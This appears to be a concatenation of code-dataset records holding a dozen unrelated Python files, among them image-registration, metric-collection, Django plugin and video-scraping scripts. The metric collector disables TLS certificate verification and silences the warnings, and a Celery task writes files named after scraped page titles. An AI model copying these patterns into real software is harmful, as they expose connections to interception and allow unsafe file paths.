A[1])\n#print('Avarage 1 & 2 in radian= ', (A[0]+A[1])/2)\n\n\n\ntranslation = (-4.8, -146)\n\ntrans_mb=[]\nfor x in mb:\n trans_mb.append(x - 
translation)\nprint('\\n Translated top sensor coordinated == ', trans_mb)\n\nmb_GC = GCenter(mb)\nprint('\\n bottom needle frame GC = ', mb_GC[0],mb_GC[1])\ntrans_mb_GC = GCenter(trans_mb)\nprint('\\n trans_mt_GC needle frame GC = ', trans_mb_GC[0],trans_mb_GC[1])\n\nmt_GC = GCenter(mt)\nprint('\\n top needle frame GC = ', mt_GC[0],mt_GC[1])\n\ntranslation_sensors = np.array([(mb_GC[0] - trans_mb_GC[0]), (mb_GC[1] - trans_mb_GC[1])])\nprint('Translation vector of Sensors == ', translation_sensors)\n\n\"\"\"\n#nt_GC = GC(nt)\nnt_GC = GCenter(nt)\nprint('\\n top needle frame GC = ', nt_GC[0],nt_GC[1])\n\n# Digonal vectors of Bottom needle frame \nnb_GC = GCenter(nb)\n#nb_GC = GCenter(nb)\nprint('\\n bottom needle frame GC = ', nb_GC[0],nb_GC[1])\n#translation = np.array([(nb_GC[0] - nt_GC[0]), (nb_GC[1] - nt_GC[1])])\ntranslation = np.array([(nb_GC[0] - nt_GC[0]), (nb_GC[1] - nt_GC[1])])\n\nprint('\\n Translation vector of needle frames == ', translation)\n\ntrans_nt=[]\nfor x in nt:\n trans_nt.append(x + translation)\nprint('\\n top needle frame after translation = ', trans_nt)\n\ntrans_nt_GC = GCenter(trans_nt)\nprint('\\n trans_nt needle frame GC = ', trans_nt_GC[0],trans_nt_GC[1])\n\n\ndiff_nb_trans_nt = [(trans_nt[0][0]-nb[0][0],trans_nt[0][1]-nb[0][1]),(trans_nt[1][0]-nb[1][0],trans_nt[1][1]-nb[1][1]),(trans_nt[2][0]-nb[2][0],trans_nt[2][1]-nb[2][1]),(trans_nt[3][0]-nb[3][0],trans_nt[3][1]-nb[3][1])]\ndiff_nt_nb = [(nt[0][0]-nb[0][0],nt[0][1]-nb[0][1]),(nt[1][0]-nb[1][0],nt[1][1]-nb[1][1]),(nt[2][0]-nb[2][0],nt[2][1]-nb[2][1]),(nt[3][0]-nb[3][0],nt[3][1]-nb[3][1])]\n\nprint('\\nDifference in initial top and bottom bridge coordinates = \\n',np.round(diff_nt_nb,2))\nprint('\\nDifference in bottom and Translated top bridge coordinates = \\n', np.round(diff_nb_trans_nt,2))\n\no_b = nb_GC #GC of top needle frame\nnb_dig=[]\nfor x in nb:\n nb_dig.append(x - o_b)\ntrans_nt_dig=[]\nfor x in trans_nt:\n trans_nt_dig.append(x - o_b)\n\nA=[0,0,0,0]\nfor i in range(4):\n A[i]= angle(nb_dig[i],trans_nt_dig[i])\nprint('Angle 1 of rotation in radian= ', A[0])\n#print('Angle 2 of rotation in radian= ', A[1])\n#print('Avarage 1 & 2 in radian= ', (A[0]+A[1])/2)\n\n#b_o1= nb[0] - o_b\n#t_o1= trans_nt[0] - o_b\n#Angle1 = angle(b_o1,t_o1)\n#b_o2= nb[1] - o_b\n#t_o2= trans_nt[1] - o_b\n#Angle2 = angle(b_o2,t_o2)\n#print('\\n angle btw first digonals Angle1 == ',Angle1 )\n#print('\\n angle btw first digonals Angle2 == ',Angle2 )\n\ntrans_rotated_nt=[]\nfor x in trans_nt_dig:\n #trans_rotated_nt.append(rotate(x,(A[0]+A[1])/2) +o_b)\n #trans_rotated_nt.append(rotate(x,(1000000)/2) +o_b)\n #trans_rotated_nt.append(rotate(x,A[1]) +o_b)\n trans_rotated_nt.append(rotate(x,-A[0])+o_b)\nprint('\\n bottom fram after Rotation = ', trans_rotated_nt)\n\ndiff_nt_trans_rot_nb = [(trans_rotated_nt[0][0]-nb[0][0],trans_rotated_nt[0][1]-nb[0][1]),(trans_rotated_nt[1][0]-nb[1][0],trans_rotated_nt[1][1]-nb[1][1]),(trans_rotated_nt[2][0]-nb[2][0],trans_rotated_nt[2][1]-nb[2][1]),(trans_rotated_nt[3][0]-nb[3][0],trans_rotated_nt[3][1]-nb[3][1])]\nprint('\\nDifference in top and rotated bottom bridge coordinates = \\n', np.round(diff_nt_trans_rot_nb,2))\n\ntrans_mt=[]\nfor x in mt:\n trans_mt.append(x + translation)\n\nprint(' \\n top sensor after translation = ', trans_mt)\n\nmb_dig=[]\nfor x in mb:\n mb_dig.append(x - o_b)\ntrans_mt_dig=[]\nfor x in trans_mt:\n trans_mt_dig.append(x - o_b)\n \ntrans_rotated_mt=[]\n#for x in trans_mb_dig:\nfor x in trans_mt_dig:\n trans_rotated_mt.append(rotate(x,-A[0])+o_b)\n 
#trans_rotated_mb.append(rotate(x,(A[0]+A[1])/2) + o_b)\n\nprint(' \\n top sensor after translation and rotation= ', trans_rotated_mt)\n#print(trans_rotated_mb)\n\n#arr_mb_new = trans_rotated_mb\n\n#mt_GC = GC(mt)\nmt_GC = GCenter(trans_rotated_mt)\nprint('top sensor GC = %.3f'% mt_GC[0],mt_GC[1])\n#mb_GC = GC(arr_mb_new)\nmb_GC = GCenter(mb)\nprint('bottom sensor GC = %.3f'% mb_GC[0],mb_GC[1])\ntranslation_sensors = np.array([(mb_GC[0] - mt_GC[0]), (mb_GC[1] - mt_GC[1])])\n#translation_sensors = np.array([(mt_GC[0] - mb_GC[0]), (mt_GC[1] - mb_GC[1])])\n\nprint('Translation vector of Sensors == ', translation_sensors)\n\n\"\"\"\n\n\n","sub_path":"reverseEngineering.py","file_name":"reverseEngineering.py","file_ext":"py","file_size_in_byte":6235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"55959725","text":"# coding=utf-8\r\n#微信 好友 地区数据统计 (会报错)\r\n\r\nfrom wxpy import *\r\nbot = Bot()\r\nbot = Bot(cache_path=True)\r\nfriends_stat = bot.friends().stats()\r\n\r\nfriend_loc = [] # 每一个元素是一个二元列表,分别存储地区和人数信息\r\nfor province, count in friends_stat[\"province\"].iteritems():\r\n if province != \"\":\r\n friend_loc.append([province, count])\r\n\r\n# 对人数倒序排序\r\nfriend_loc.sort(key=lambda x: x[1], reverse=True)\r\n\r\n# 打印人数最多的10个地区\r\nfor item in friend_loc[:10]:\r\n print(item[0], item[1])","sub_path":"wxpy03.py","file_name":"wxpy03.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"644959724","text":"#!/usr/bin/python3\n\nimport sys\nsys.path.append(sys.path[0] + '/lib')\nfrom library import sieve_eratosthenes\nfrom euler import verify_result\n\n\ndef run_problem():\n sum = 0\n\n for i in list(sieve_eratosthenes(2000000)):\n sum += i\n\n return sum\n\nif __name__ == \"__main__\":\n verify_result(142913828922, run_problem)","sub_path":"problem010.py","file_name":"problem010.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"346177310","text":"import numpy as np\nimport pandas as pd\nfrom skimage import transform\nfrom keras.preprocessing.image import load_img\n\n\n\ndef read_csv(paths):\n # read in csv from list of paths. 
Using pandas for easy handling\n driving_log = pd.DataFrame([])\n for path in paths:\n csv_data = pd.read_csv(path + \"driving_log.csv\", header=None,\n names=['Center Image', 'Left Image', 'Right Image', 'Steering Angle',\n 'Throttle', 'Break', 'Speed'])\n driving_log = pd.concat([driving_log, csv_data])\n return driving_log\n\n\ndef clean_data(driving_log, upper_angle=2.0, zero_frac=0.1):\n # clean the driving log data:\n\n a = driving_log.shape[0]\n\n # Safe small number of sample of going straight\n zero_lines = driving_log[driving_log['Steering Angle'] == 0]\n b = zero_lines.shape[0]\n zero_lines_sample = zero_lines.sample(frac=zero_frac, random_state=42)\n c = zero_lines_sample.shape[0]\n\n # Drop all samples of driving straight\n driving_log = driving_log[driving_log['Steering Angle'] != 0]\n d = driving_log.shape[0]\n\n # Drop samples with large steering angles left and right\n driving_log = driving_log[driving_log['Steering Angle'] < upper_angle]\n driving_log = driving_log[driving_log['Steering Angle'] > - upper_angle]\n e = driving_log.shape[0]\n\n # Add some samples of driving straight back in\n driving_log = pd.concat([driving_log, zero_lines_sample])\n f = driving_log.shape[0]\n\n # Print statistics\n print('Number of samples in input data:', a)\n print('Samples going straight:', b, ', Samples steering: ', d)\n print('Number of random samples going straight that are rescued (', zero_frac * 100, '% ):', c)\n print('Number after dropping large steering angles ( larger than +-', upper_angle, '):', e)\n print('Number of cleaned samples with rescued samples: ', f)\n\n return driving_log\n\n\ndef load_and_augment_image(sample):\n # Run randomize to determine what kind of augmentation is used.\n # There are 4 kinds of augmentations with 3 ways each\n # 1. Camera: left image | center image | right image\n # 2. Flip: normal | flipped\n # 3. Brightness: bright | normal | dark\n # 4. Horizontal shift: left | normal | right\n # 5. Vertical shift: up | normal | down\n\n rand = np.random.random(5)\n\n # 1. Camera: left image | center image | right image\n image, steering_angle = load_image(sample, rand[0])\n\n # 2. Flip: normal | flipped\n image, steering_angle = flip_image(image, steering_angle, rand[1])\n\n # 3. Brightness: bright | normal | dark\n image = brightness_image(image, rand[4])\n\n # 4. Horizontal shift: left | normal | right\n # image = h_shift_image(image, rand[2])\n\n # 5. 
Vertical shift: up | normal | down\n # image = v_shift_image(image, rand[3])\n\n return image, steering_angle\n\n\ndef load_image(sample, rand=0.5, steering_correction=0.15):\n # Load center, left or right image based on rand\n steering_angle = float(sample[3])\n if rand < 1 / 3:\n # Left image\n image_path = sample[1]\n steering_angle += steering_correction\n elif rand > 2 / 3:\n # Right image\n image_path = sample[2]\n steering_angle -= steering_correction\n else:\n # Center image\n image_path = sample[0]\n\n # Load image and steering angle\n image = load_img(image_path)\n return image, steering_angle\n\n\ndef flip_image(img, angle, rand=1.0):\n if rand < 0.5:\n img = np.fliplr(img)\n angle = angle * -1.0\n return img, angle\n\n\ndef brightness_image(img, rand=0.5):\n amount = (rand - 0.5) * 191 # * 255 * 0.75\n img = img + amount\n img = np.clip(img, 0, 255)\n return img\n\n\ndef v_shift_image(img, rand=0.5):\n if rand < 1 / 3:\n tform = transform.AffineTransform(rotation=0, shear=0, translation=(0, 20))\n img = transform.warp(img, tform)\n elif rand > 2 / 3:\n tform = transform.AffineTransform(rotation=0, shear=0, translation=(0, -20))\n img = transform.warp(img, tform)\n return img\n\n\ndef h_shift_image(img, rand=0.5):\n if rand < 1 / 3:\n tform = transform.AffineTransform(rotation=0, shear=0, translation=(50, 0))\n img = transform.warp(img, tform)\n elif rand > 2 / 3:\n tform = transform.AffineTransform(rotation=0, shear=0, translation=(-50, 0))\n img = transform.warp(img, tform)\n return img\n","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":4415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"51590133","text":"# Interactive textbook -- Python Basics. Control assignments 3 (translated from Ukrainian; the original comment was partially garbled)\n\ndef func(var_a, var_b):\n '''compares \"var_a\" and \"var_b\". returns \">\" \"=\" \"<\" or \"str\"\n '''\n if type(var_a) == str or type(var_b) == str:\n return 'str'\n if var_a > var_b :\n return '>'\n elif var_a == var_b:\n return '='\n elif var_a < var_b:\n return '<'\n\ndef count_holes(value):\n '''returns an integer - the number of “holes” in the record of this number, or the string 'error' if the argument passed does not satisfy the requirements: the number is not an integer or is not a number at all. Zeros at the beginning of the recording of a number are not taken into account, if any\n '''\n try:\n int(value)\n except:\n return 'error'\n count_h = 0\n for item in str(int(value)):\n if item in '4690':\n count_h += 1\n elif item == '8':\n count_h += 2\n if count_h == 0:\n return 'error'\n return count_h\n
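\n# (Editor's note, added) Quick reference for count_holes above: '0', '4', '6'\n# and '9' each contribute one hole and '8' contributes two, so e.g.\n# count_holes(48) -> 3 and count_holes('0023') -> 'error' (this implementation\n# reports a number with no holes as 'error' rather than 0).\n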
\ndef hangman(word, letters):\n '''The function replaces the letters in the string \"word\" with the underscore character \"_\", if they are not in the list of \"letters\" and returns the modified string'''\n new_word = ''\n for item in word:\n if item in letters:\n new_word += item\n else:\n new_word += ' _ '\n return new_word.strip()\n\nprint(func('2',3))\nprint(func(333,434))\nprint(func.__doc__)\n\nprint('0023 >> ', count_holes('0023'))\nprint('08824 >> ', count_holes('08824'))\nprint('00abc >> ', count_holes('00abc'))\nprint(count_holes.__doc__)\n\nprint(hangman('python', ['a', 'r', 'y', 'i', 'o']))\nprint(hangman.__doc__)","sub_path":"sensey_03.py","file_name":"sensey_03.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"26721954","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nimport json\nimport requests\nfrom bson.objectid import ObjectId\nfrom tornado.web import RequestHandler\nfrom tornado.log import app_log\nfrom config import mongo_meida\nfrom config.category_tags import tags, SECOND_TYPE, FIRST_TYPE\nfrom config.color_synon import COLOR_SYNON\n# from icehole_client.search_client import SearchClient\n\nFILTER_SET = set()\n\nclass MeidaSkuToStar(RequestHandler):\n\n def initialize(self):\n self.item_collection = mongo_meida\n\n def get(self):\n item_id = self.get_argument('sku_id', '')\n color = self.get_argument('color', '')\n page = self.get_argument('page', '1')\n page_size = self.get_argument('page_size', '10')\n try:\n page = int(page)\n page_size = int(page_size)\n from_ = (page - 1) * page_size\n size = page_size\n except Exception as e:\n app_log.error(u\"invalid paging parameters: \" + str(e))\n info = u\"invalid paging parameters\"\n error = 0\n self.json_response(info=info, error=error)\n return\n if not item_id:\n app_log.error(u\"item_id is empty\")\n info = u\"item_id is empty\"\n error = 0\n self.json_response(info=info, error=error)\n return\n #try:\n if True:\n item = self.get_item(item_id)\n if item:\n search_text = color + item.get(\"title\")\n stars, item_desc = \\\n self.search_star_by_item(\n search_text, 0, from_, size)\n info = dict(\n sku_title=color+item_desc,\n stars=stars,\n )\n error = 1\n else:\n app_log.error(u\"item not found\")\n info = u\"item not found\"\n error = 0 # fixed: was misspelled \"erorr\", so this branch never set the response flag\n #except Exception as e:\n # app_log.error(u\"server error: \" + str(e))\n # info = u\"server error\"\n # error = 0\n self.json_response(info=info, error=error)\n
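\n # (Editor's note, added) Illustrative request/response shape for this\n # handler -- the route path is hypothetical, only the query parameters\n # appear in this file:\n #   GET /...?sku_id=MONGO_ID&color=red&page=1&page_size=10\n #   -> {\"result\": 1, \"data\": {\"sku_title\": ..., \"stars\": [...]}, \"error\": \"\"}\n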
item_desc = u\"\".join(props) + sku_type\n return stars, item_desc\n\n\n def build_item(self, hit):\n source_data = hit.get(\"source\")\n return dict(\n id=source_data.get(\"id\"),\n url=source_data.get(\"srcImage\"),\n title=\"+\".join([part.values()[0] for part in source_data.get(\"parts\")])\n )\n\n\n def build_item_desc(self, tokens):\n #item_token_list = [token.get(\"text\") for token in tokens if token.get(\"text\") not in FILTER_SET]\n props = []\n for token in tokens:\n term = token.get(\"text\")\n if term in tags and len(term) > 1:\n props.append(term)\n elif term in SECOND_TYPE:\n second_type = term\n elif term in FIRST_TYPE:\n first_type = term\n if not second_type and first_type:\n second_type = first_type\n return set(props), second_type\n # return \"\".join(item_token_list)\n\n\n def json_response(self, info, error=0):\n self.set_header(\"content-type\", \"application/json\")\n if error == 0:\n result_dict = dict(result=0, data=\"\", error=info)\n elif error == 1:\n result_dict = dict(result=1, data=info, error=\"\")\n elif error == -1:\n result_dict = dict(result=-1, data=\"\", error=info)\n elif error == -2:\n result_dict = dict(result=-2, data=\"\", error=info)\n result_json = json.dumps(result_dict)\n var = self.get_argument(\"var\", \"\")\n if var:\n result_json = var + \"=\" + result_json\n self.write(result_json)\n\n\n","sub_path":"views/meida_star_to_sku.py","file_name":"meida_star_to_sku.py","file_ext":"py","file_size_in_byte":4722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"541770008","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.forms import widgets\nfrom django.forms.widgets import RadioFieldRenderer\nfrom django.utils.html import format_html, format_html_join\nfrom django.utils.datastructures import SortedDict\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.utils.encoding import force_text\nfrom cms.plugin_pool import plugin_pool\nfrom cmsplugin_cascade.fields import PartialFormField\nfrom cmsplugin_cascade.widgets import MultipleCascadingSizeWidget\nfrom cmsplugin_cascade.link.forms import TextLinkForm\nfrom cmsplugin_cascade.link.plugin_base import LinkPluginBase, LinkElementMixin\n\n\nclass ButtonTypeRenderer(RadioFieldRenderer):\n \"\"\"\n Render sample buttons in different colors in the button's backend editor.\n \"\"\"\n BUTTON_TYPES = SortedDict((('btn-default', _('Default')), ('btn-primary', _('Primary')),\n ('btn-success', _('Success')), ('btn-info', _('Info')), ('btn-warning', _('Warning')),\n ('btn-danger', _('Danger')), ('btn-link', _('Link')),))\n\n def render(self):\n return format_html('
<div class=\"form-row\">{0}</div>',\n            format_html_join('\\n', '<div class=\"field-box\">'\n                '<span class=\"btn {1}\">{2}</span>'\n                '<div class=\"label\">{0}</div>'\n                '</div>
',\n ((force_text(w), w.choice_value, force_text(self.BUTTON_TYPES[w.choice_value])) for w in self)\n ))\n\n\nclass ButtonSizeRenderer(RadioFieldRenderer):\n \"\"\"\n Render sample buttons in different sizes in the button's backend editor.\n \"\"\"\n BUTTON_SIZES = SortedDict((('btn-lg', _('Large')), ('', _('Default')), ('btn-sm', _('Small')),\n ('btn-xs', _('Extra small')),))\n\n def render(self):\n return format_html('
<div class=\"form-row\">{0}</div>',\n            format_html_join('\\n',\n                '<div class=\"field-box\">'\n                '<span class=\"btn btn-default {1}\">{2}</span>'\n                '<span class=\"btn btn-primary {1}\">{2}</span>'\n                '<div class=\"label\">{0}</div>'\n                '</div>
',\n ((force_text(w), w.choice_value, force_text(self.BUTTON_SIZES[w.choice_value])) for w in self)\n ))\n\n\nclass BootstrapButtonPlugin(LinkPluginBase):\n module = 'Bootstrap'\n name = _(\"Button\")\n form = TextLinkForm\n model_mixins = (LinkElementMixin,)\n parent_classes = ['BootstrapColumnPlugin']\n render_template = 'cascade/bootstrap3/button.html'\n allow_children = False\n text_enabled = True\n tag_type = None\n default_css_class = 'btn'\n default_css_attributes = ('button-type', 'button-size', 'button-options', 'quick-float',)\n fields = ('link_content', ('link_type', 'cms_page', 'ext_url', 'mail_to'), 'glossary',)\n glossary_fields = (\n PartialFormField('button-type',\n widgets.RadioSelect(choices=((k, v) for k, v in ButtonTypeRenderer.BUTTON_TYPES.items()),\n renderer=ButtonTypeRenderer),\n label=_('Button Type'),\n initial='btn-default',\n help_text=_(\"Display Link using this Button Style\")\n ),\n PartialFormField('button-size',\n widgets.RadioSelect(choices=((k, v) for k, v in ButtonSizeRenderer.BUTTON_SIZES.items()),\n renderer=ButtonSizeRenderer),\n label=_('Button Size'),\n initial='',\n help_text=_(\"Display Link using this Button Size\")\n ),\n PartialFormField('button-options',\n widgets.CheckboxSelectMultiple(choices=(('btn-block', _('Block level')), ('disabled', _('Disabled')),)),\n label=_('Button Options'),\n ),\n PartialFormField('quick-float',\n widgets.RadioSelect(choices=(('', _(\"Do not float\")), ('pull-left', _(\"Pull left\")), ('pull-right', _(\"Pull right\")),)),\n label=_('Quick Float'),\n initial='',\n help_text=_(\"Float the button to the left or right.\")\n ),\n ) + LinkPluginBase.glossary_fields + (\n PartialFormField('inline_styles',\n MultipleCascadingSizeWidget(['margin-top', 'margin-right', 'margin-bottom', 'margin-left'],\n allowed_units=['px', 'em'], required=False),\n label=_('Margins'),\n help_text=_('Margins for this button wrapper.')\n ),\n )\n\n class Media:\n css = {'all': ('cascade/css/admin/bootstrap.min.css', 'cascade/css/admin/bootstrap-theme.min.css',)}\n\n @classmethod\n def get_identifier(cls, obj):\n identifier = super(BootstrapButtonPlugin, cls).get_identifier(obj)\n content = obj.glossary.get('link_content')\n if not content:\n try:\n content = force_text(ButtonTypeRenderer.BUTTON_TYPES[obj.glossary['button-type']])\n except KeyError:\n content = _(\"Empty\")\n return format_html('{0}{1}', identifier, content)\n\nplugin_pool.register_plugin(BootstrapButtonPlugin)\n","sub_path":"cmsplugin_cascade/bootstrap3/buttons.py","file_name":"buttons.py","file_ext":"py","file_size_in_byte":5024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"307537280","text":"from app import create_app\nfrom core.settings import get_config\n\n\nif __name__ == '__main__':\n app = create_app()\n app.run(\n host='0.0.0.0',\n debug=False if get_config().env == 'production' else True,\n port=8000,\n )\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"642359048","text":"import logging\nimport time\nimport requests\nimport warnings\nwarnings.filterwarnings('ignore')\n\nlogger = logging.getLogger('json_collector')\n\n\nclass JsonCollector(object):\n\n def __init__(self, host, address, credential, port=443, timeout=15, retry=3, parsers=None,\n context=None, device_type='f5'):\n self.hostname = host\n self.host = address\n self.credential = credential\n self.__port = 
port\n self.__timeout = timeout\n self.__retry = retry\n self.__is_connected = False\n self.parsers = parsers\n if context:\n self.context = {k: v for i in context for k, v in i.items()}\n else:\n self.context = None\n self.facts = {}\n self.device_type = device_type\n self.base_url = 'http://{}/'.format(self.host)\n if port == 443:\n self.base_url = 'https://{}/'.format(self.host)\n elif port != 80:\n self.base_url = 'https://{}:{}/'.format(self.host, port)\n\n def connect(self):\n logger.info('Connecting to host: %s at %s', self.hostname, self.host)\n\n use_token = False\n user = self.credential.get('username')\n passwd = self.credential.get('password')\n if self.credential['method'] == 'vault':\n user, passwd = self._get_credentials_from_vault()\n if self.credential.get('use_token', 'false').lower() == 'true':\n use_token = True\n if not user or not passwd:\n logger.error('Invalid or no credentials specified')\n return\n self.session = requests.Session()\n self.session.auth = (user, passwd)\n self.session.verify = False\n self.__is_connected = True\n\n def collect_facts(self):\n logger.info('[%s]: Collecting Facts on device', self.hostname)\n\n if self.hostname:\n self.facts['device'] = self.hostname\n\n # TODO(Mayuresh) Collect any other relevant facts here\n\n def execute_query(self, query):\n for retry in range(self.__retry):\n logger.debug('[%s]: execute : %s', self.hostname, query)\n try:\n if self.device_type == 'f5':\n q = self.base_url + query\n result = self.session.get(q, timeout=self.__timeout)\n result.raise_for_status()\n return result.json()\n elif self.device_type == 'arista':\n q = self.base_url + 'command-api'\n body = {\n 'jsonrpc': '2.0',\n 'method': 'runCmds',\n 'params': {\n 'format': 'json',\n 'timestamps': False,\n 'autoComplete': False,\n 'expandAliases': False,\n 'cmds': [ query ],\n 'version': 1\n },\n 'id': 'MetricCollector-1'\n }\n result = self.session.post(q, timeout=self.__timeout, json=body)\n result.raise_for_status()\n resp = result.json()\n return resp['result'][0]\n except Exception as ex:\n logger.error('Failed to execute query: %s on %s: %s, retrying #%d', query, self.hostname, str(ex), retry)\n time.sleep(2)\n continue\n logger.error('Failed to connect to execute on %s at %s after %d tries', self.hostname, self.host, self.__retry)\n\n def collect(self, command):\n\n # find the command/query to execute\n logger.debug('[%s]: parsing : %s', self.hostname, command)\n parser = self.parsers.get_parser_for(command)\n try:\n if self.device_type == 'f5':\n raw_data = self.execute_query(parser['data']['parser']['query'])\n elif self.device_type == 'arista':\n raw_data = self.execute_query(parser['data']['parser']['command'])\n except TypeError as e:\n logger.error('Parser returned no data. 
Message: {}'.format(e))\n raw_data = None\n if not raw_data:\n return None\n datapoints = self.parsers.parse(command, raw_data)\n\n if datapoints is not None:\n measurement = self.parsers.get_measurement_name(input=command)\n timestamp = time.time_ns()\n for datapoint in datapoints:\n if not datapoint['fields']:\n continue\n if datapoint['measurement'] is None:\n datapoint['measurement'] = measurement\n datapoint['tags'].update(self.facts)\n if self.context:\n datapoint['tags'].update(self.context)\n datapoint['timestamp'] = timestamp\n yield datapoint\n\n else:\n logger.warn('No parser found for command > %s', command)\n return None\n\n def is_connected(self):\n return self.__is_connected\n\n def close(self):\n # rest connection is not stateful so nothing to close\n return\n","sub_path":"lib/metric_collector/json_collector.py","file_name":"json_collector.py","file_ext":"py","file_size_in_byte":5125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"607402663","text":"from django import template\n\nregister = template.Library()\n\n@register.filter(name='is_prd_in_cart')\ndef is_prd_in_cart(product , cart):\n keys = cart.keys()\n for id in keys:\n if int(id) == product.id:\n return True\n return False\n\n@register.filter(name='cart_qty')\ndef cart_qty(product , cart):\n keys = cart.keys()\n for id in keys:\n if int(id) == product.id:\n return cart.get(id)\n return 0\n\n@register.filter(name='total_price')\ndef total_price(product , cart):\n return product.Price * cart_qty(product,cart) \n\n@register.filter(name='total_cart_price')\ndef total_cart_price(products,cart):\n sum=0\n for p in products:\n sum+=total_price(p,cart)\n return sum ","sub_path":"Epshop/store/templatetags/cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"148935354","text":"import numpy as np\nimport sys\n#import SimpleITK as sitk\nimport subprocess\nimport itertools\nimport os\nimport glob\n#try:\n\ndef load_names(DIR):\n DIR = os.path.join(DIR, '*')\n b=glob.glob(DIR)\n M,M_seg=[],[]\n for i in b:\n if i.split('/')[-1][:12]:\n paths=glob.glob(i+'/*')\n c,d=[],[]\n if len(paths)==3: \n for j in paths:\n a=j.split('/')\n if a[-1].startswith('00_seg'):\n M_seg.append(j)\n elif a[-1].split('_')[3]=='11':\n M.append(j)\n F='/data/Liver_part/Multi_modality_data/700005_HELENA_20150527/700005_HELENA_20150527_11_3D_GRE_TRA_HELENA_W.nrrd'\n F_seg='/data/Liver_part/Multi_modality_data/700005_HELENA_20150527/00_seg, 30.08.2017, 700005_HELENA_20150527_11_3D_GRE_TRA_HELENA_W.nrrd'\n return F, M, F_seg, M_seg\n\ndef ANTs_on_data(Dir):\n\n F, M, F_seg, M_seg= load_names(Dir)\n out_DIR='/data/fahad_thesis/Result/'\n for i in range(len(M)):\n\n f_seg, m_seg=[],[]\n out_f_seg, out_m_seg=[], []\n '''Generating the output filenames'''\n if not os.path.exists(os.path.join(out_DIR, M[i].split(\"/\")[-2])):\n os.makedirs(os.path.join(out_DIR, M[i].split(\"/\")[-2]))\n\n out_M_img = os.path.join(out_DIR,M[i].split('/')[-2], M[i].split('/')[-1])\n field = os.path.join(out_DIR,M[i].split('/')[-2], 'field')\n\n command = [\"/home/hfahad/ANTs/bin/bin/antsRegistration\", '--dimensionality', '3',\n '--write-composite-transform', '1','--output', '['+field+','+out_M_img+']', '--float','0',\\\n '--interpolation', 'Linear', '--winsorize-image-intensities', '[0.005,0.995]',\\\n '--use-histogram-matching', '0', '--verbose', '1', 
'--initial-moving-transform','['+F+','+M[i]+',1]',\\\n\t\t'--transform', 'SyN[0.25]', '--metric', 'CC['+F+','+M[i]+',1,4]',\\\n\t\t'--convergence',\\\n '[500x250x200x200,1e-6,20]', '--shrink-factors', '8x4x2x1', '--smoothing-sigmas', '3x2x1x0vox',\\\n ]\n cmd = subprocess.Popen(command)\n cmd.communicate()\n\n out_m_seg = os.path.join(out_DIR,M_seg[i].split('/')[-2],M_seg[i].split('/')[-1])\n\n command = [\"/home/hfahad/ANTs/bin/bin/antsApplyTransforms\", '-d', '3', '-i', M_seg[i], '-r', F,\n '--interpolation', 'NearestNeighbor', '-o', out_m_seg, '-t', field+'Composite.h5']\n cmd = subprocess.Popen(command)\n cmd.communicate()\n\nprint('Program is start')\nANTs_on_data('/data/Liver_part/Multi_modality_data/crop_multi_data')\n\n\n","sub_path":"mono_liver_ants/Mono-modal/ANTsWorkflow.py","file_name":"ANTsWorkflow.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"255085635","text":"import os\nimport re\nimport json\nimport requests\nimport urllib\n\nfrom celery import Celery\nfrom lxml import etree\n\nfrom . import flask_app, db\nfrom .models import Task\n\n\ndef make_celery(flask_app):\n celery = Celery(\n flask_app.import_name,\n backend=flask_app.config['CELERY_RESULT_BACKEND'],\n broker=flask_app.config['CELERY_BROKER_URL']\n )\n celery.conf.update(flask_app.config)\n\n class ContextTask(celery.Task):\n def __call__(self, *args, **kwargs):\n with flask_app.app_context():\n return self.run(*args, **kwargs)\n\n celery.Task = ContextTask\n return celery\n\n\nflask_celery = make_celery(flask_app)\n\n\n@flask_celery.task\ndef download_video(task_id, path):\n task = Task.query.get(task_id)\n\n headers = {\n 'User-Agent':\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',\n }\n\n s = requests.Session()\n resp = s.get(task.url, headers=headers)\n html = etree.HTML(resp.content)\n\n site = \"pornhub\"\n if task.url.startswith(\"https://www.xvideos.com\"):\n site = \"xvideos\"\n\n # 获取视频标题\n title = get_title(html, site)\n\n # 更新任务标题和状态\n task.title = title\n task.status = 1\n db.session.add(task)\n db.session.commit()\n\n # 开始下载视频\n download_url = get_download_url(html, site)\n\n try:\n download(path, download_url, title, 'mp4')\n task.status = 2\n except Exception:\n print(\"download exception\")\n task.status = -1\n pass\n\n db.session.add(task)\n db.session.commit()\n\n\ndef download(path, url, name, filetype):\n filepath = '%s/%s.%s' % (path, name, filetype)\n if os.path.exists(filepath):\n return\n urllib.request.urlretrieve(url, '%s' % filepath)\n\n\ndef get_download_url(html, site):\n if site == \"xvideos\":\n return html.cssselect(\"#html5video_base\")[0].xpath(\"div//a\")[-1].values()[1]\n elif site == \"pornhub\":\n js = html.xpath('//*[@id=\"player\"]/script/text()')[0]\n tem = re.findall('var\\\\s+\\\\w+\\\\s+=\\\\s+(.*);\\\\s+var 